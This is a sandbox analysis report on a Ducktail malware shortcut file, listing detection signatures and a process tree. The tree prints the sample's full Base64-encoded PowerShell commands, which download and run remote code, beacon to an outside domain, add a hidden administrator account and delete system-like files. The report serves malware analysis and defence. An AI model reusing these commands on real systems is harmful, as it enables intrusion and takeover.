Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gW6FHWNFzR.lnk

Overview

General Information

Sample name:gW6FHWNFzR.lnk
Analysis ID:1551867
MD5:a4c59e5ed953a077c26e3493fd12485b
SHA1:9b52cc40deda887fb9dfbb2ca6eec9e7e3d233fb
SHA256:6bcf81075209485ee886b6b3a170129a30b777cf496b23c8d1f69e4ca8b9de2b
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 1868 cmdline: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 3340 cmdline: PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 8228 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 8248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAEBA.tmp" "c:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 8464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • WINWORD.EXE (PID: 8852 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\About-Us.docx.docx" /o "" MD5: E7F3B8EA1B06F46176FC5C35307727D6)
      • cmd.exe (PID: 8704 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 8756 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 8336 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • sppsvc.exe (PID: 8308 cmdline: C:\Windows\system32\sppsvc.exe MD5: 30C7EF47B57367CC546173BB4BB2BB04)
  • svczHost.exe (PID: 7664 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 1348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8524 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 8608 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 8508 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 8620 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 5428 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
